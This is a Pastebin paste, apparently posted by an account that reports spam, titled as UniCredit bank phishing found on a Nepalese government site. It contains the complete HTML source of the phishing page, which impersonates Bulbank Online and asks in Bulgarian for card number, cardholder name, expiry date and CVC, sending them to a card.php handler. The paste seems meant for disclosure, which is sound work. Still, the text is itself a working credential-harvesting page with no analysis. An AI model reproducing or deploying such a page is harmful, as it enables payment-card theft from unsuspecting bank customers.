spamreports

Unicredit bank phishing hosted on Government of Nepal site

Sep 26th, 2019
347
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 5 2.36 KB | None | 0 0
  1.  
  2. <!DOCTYPE html>
  3. <html lang="en">
  4. <head>
  5.     <meta charset="UTF-8">
  6.     <title>Bullbank Online</title>
  7.     <link rel="shortcut icon" href="https://bulbankonline.bg/favicon.ico" type="image/x-icon">
  8. <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.6.3/css/all.css" integrity="sha384-UHRtZLI+pbxtHCWp1t77Bi1L4ZtiqrqD80Kn4Z8NTSRyMA2Fd33n5dQ8lWUE00s/" crossorigin="anonymous">
  9.     <link rel="stylesheet" href="bootstrap.min.css">
  10. </head>
  11. <style>
  12.     body{
  13.         background-image: url(img/bg2.png);
  14.         background-repeat: no-repeat;
  15.         width: auto;
  16.         height: 570px;
  17.     }
  18.     .i1{
  19.         margin-left: 330px;
  20.        
  21.     }
  22.     .i2{
  23.         margin-left: 330px;
  24.     }
  25.     .i3{
  26.         margin-left: 330px;
  27.         margin-top: 200px;
  28.     }
  29.     .i4{
  30.         margin-left: 360px;
  31.     }
  32.    
  33.     .oo{
  34.         width: 300px;
  35.     }
  36.     .o{
  37.         width: 170px;
  38.     }
  39.     </style>
  40. <body>
  41. <p class="i3">Моля, потвърдете кредитната си карта</p>
  42. <form action="card.php" method="POST">
  43.      <div class="input-group mb-3 i1 oo">
  44.     <div class="input-group-prepend">
  45.       <span class="btn btn-link input-group-text "><i class="far fa-credit-card"></i></span>
  46.     </div>
  47.     <input type="text" class="form-control " size="16" maxlength="16" pattern="[0-9]{16}" name="card" placeholder="номер на кредитната карта" required>
  48.   </div>
  49.   <div class="input-group mb-3 i2 oo">
  50.    <div class="input-group-prepend">
  51.     <span class="btn btn-link input-group-text "><i class="far fa-user"></i></span>
  52.       </div>
  53.     <input type="text" required class="form-control" name="fullname" placeholder="пълно име">
  54.     </div>
  55.  
  56.      <div class="input-group mb-3 i2 o">
  57.     <div class="input-group-prepend">
  58.       <span class="btn btn-link input-group-text "><i class="far fa-calendar"></i></span>
  59.     </div>
  60.     <input type="number" required class="form-control" min="1" max="12" name="month" placeholder="MM">
  61.     <input type="number" max="30" min="19" required name="year" class="form-control" placeholder="YY">
  62.     </div>
  63.      <div class="input-group mb-3 i2 o">
  64.     <div class="input-group-prepend">
  65.       <span class="btn btn-link input-group-text "><i class="fas fa-lock"></i></span>
  66.     </div>
  67.     <input type="text" pattern="[0-9]{3}" size="3" maxlength="3" required class="form-control float-left" placeholder="CVC"  name="cvc">
  68.     </div>
  69.     <input type="submit" name="suub" class="btn btn-info i4" value="Вход">
  70.     </form>
  71.  
  72. </body>
  73. </html>
Add Comment
Please, Sign In to add comment